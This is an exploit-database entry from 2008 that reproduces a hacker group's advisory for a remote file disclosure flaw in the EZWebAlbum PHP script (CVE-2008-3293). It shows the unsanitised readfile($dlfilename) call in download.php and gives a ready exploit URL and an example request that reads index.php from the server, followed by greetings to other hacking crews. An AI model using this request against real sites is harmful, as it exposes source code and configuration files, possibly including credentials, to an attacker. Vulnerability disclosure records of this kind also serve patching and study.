EZWebAlbum - Remote File Disclosure

Author: Ghost Hacker
type: webapps
platform: php
port: 
date_added: 2008-07-20 
date_updated: 2016-12-21 
verified: 1 
codes: OSVDB-47164;CVE-2008-3293 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comezwebalbum.zip

##################################################################################################
 EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability     |,  .-.  .-.  ,|
 Found by : Ghost Hacker [ R-H TeaM ]                             | )(_o/  \o_)( |
 My Site web : Real-hack.Net                                      |/     /\     \|
##################################################################################################
[~] Found by : Ghost Hacker [ R-H TeaM ]
[~] Home page : www.Real-hack.net
[~] Email : Ghost-r00t@Hotmail.com
[~] Name Script : EZWebAlbum
[~] Download Script : http://sourceforge.net/projects/ezwebalbum
###################################### [ Viva IslaM & KSA ] ######################################
[~] Error (download.php) :
readfile($dlfilename);

[~] Exploit :
http://xxxx/[path]/download.php?dlfilename=EVIL
[~] Example :
http://xxxx/[path]/download.php?dlfilename=index.php
###################################### [ Viva IslaM & KSA ] ######################################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker ..
Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ]
All Members Real Hack And All My Friends ..
##################################################################################################
 Found by : Ghost Hacker [ R-H TeaM ]
##################################################################################################

# milw0rm.com [2008-07-21]